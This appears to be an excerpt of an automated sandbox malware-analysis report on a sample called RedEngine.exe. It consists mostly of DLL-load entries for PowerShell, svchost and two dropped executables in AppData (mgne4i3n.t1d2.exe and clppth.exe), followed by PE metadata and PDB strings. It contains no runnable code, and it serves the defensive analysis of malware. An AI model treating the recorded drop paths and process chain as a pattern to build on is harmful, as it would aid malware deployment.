                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: apphelp.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: appresolver.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47langs.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: slc.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: sppc.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: tiledatarepository.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: staterepository.core.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepository.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: wtsapi32.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositorycore.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: mrmcorer.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: appxdeploymentclient.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: vcruntime140.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: python3.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: libffi-8.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: libcrypto-3.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: libssl-3.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: tcl86t.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: tk86t.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: netapi32.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: zlib1.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: logoncli.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: netutils.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: samcli.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: textinputframework.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: coreuicomponents.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: coremessaging.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: coremessaging.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe Section loaded: wintypes.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe Section loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe Section loaded: vcruntime140.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe Section loaded: python3.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe Section loaded: libffi-8.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe Section loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe Section loaded: libcrypto-3.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe Section loaded: libssl-3.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe Section loaded: tcl86t.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe Section loaded: tk86t.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe Section loaded: netapi32.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe Section loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe Section loaded: zlib1.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe Section loaded: logoncli.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe Section loaded: netutils.dll
                        Source: C:\Users\user\Desktop\RedEngine.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
                        Source: Window Recorder Window detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: RedEngine.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: RedEngine.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3808593718.00007FFB1E3A3000.00000002.00000001.01000000.00000014.sdmp, clppth.exe, 00000026.00000003.1855125182.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1948258796.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: mgne4i3n.t1d2.exe, 0000001F.00000002.3799490703.00007FFB029C2000.00000002.00000001.01000000.0000000E.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: mgne4i3n.t1d2.exe, 0000001F.00000002.3803291292.00007FFB041BF000.00000002.00000001.01000000.00000022.sdmp, clppth.exe, 00000029.00000003.2059501286.000002C498ACE000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: mgne4i3n.t1d2.exe, 0000001F.00000002.3797179498.00007FFB02511000.00000002.00000001.01000000.00000016.sdmp
